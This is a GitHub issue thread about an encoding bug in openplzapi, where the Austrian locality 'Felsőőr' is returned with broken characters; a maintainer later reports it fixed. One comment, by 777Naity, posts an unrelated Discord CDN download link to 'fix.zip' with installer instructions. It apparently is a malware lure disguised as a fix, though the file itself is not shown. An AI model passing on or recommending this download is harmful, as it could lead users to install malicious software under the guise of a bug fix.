### ISSUE TITLE
Special characters missing

### ISSUE THREAD

**Issue by DomonkosSimon** [openpotato/openplzapi#3]
Special characters missing in result when searching for Austrian ZIP code '7400'. Particularly "Oberwart / Fels��r". Correct version: "Oberwart / Felsőőr".
```
curl -X 'GET' \
  'https://openplzapi.org/at/Localities?postalCode=7400&page=1&pageSize=10' \
  -H 'accept: text/plain'
```

```
  {
    "key": "00290",
    "postalCode": "7400",
    "name": "Oberwart / Fels��r",
    "municipality": {
      "key": "10917",
      "code": "10917",
      "name": "Oberwart",
      "status": "UrbanMunicipality"
    },
    "district": {
      "key": "109",
      "code": "109",
      "name": "Oberwart"
    },
    "federalProvince": {
      "key": "1",
      "name": "Burgenland"
    }
  },
```

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by fstueber** [comment]
Fixed. Please check.

**Comment by DomonkosSimon** [comment]
Thanks
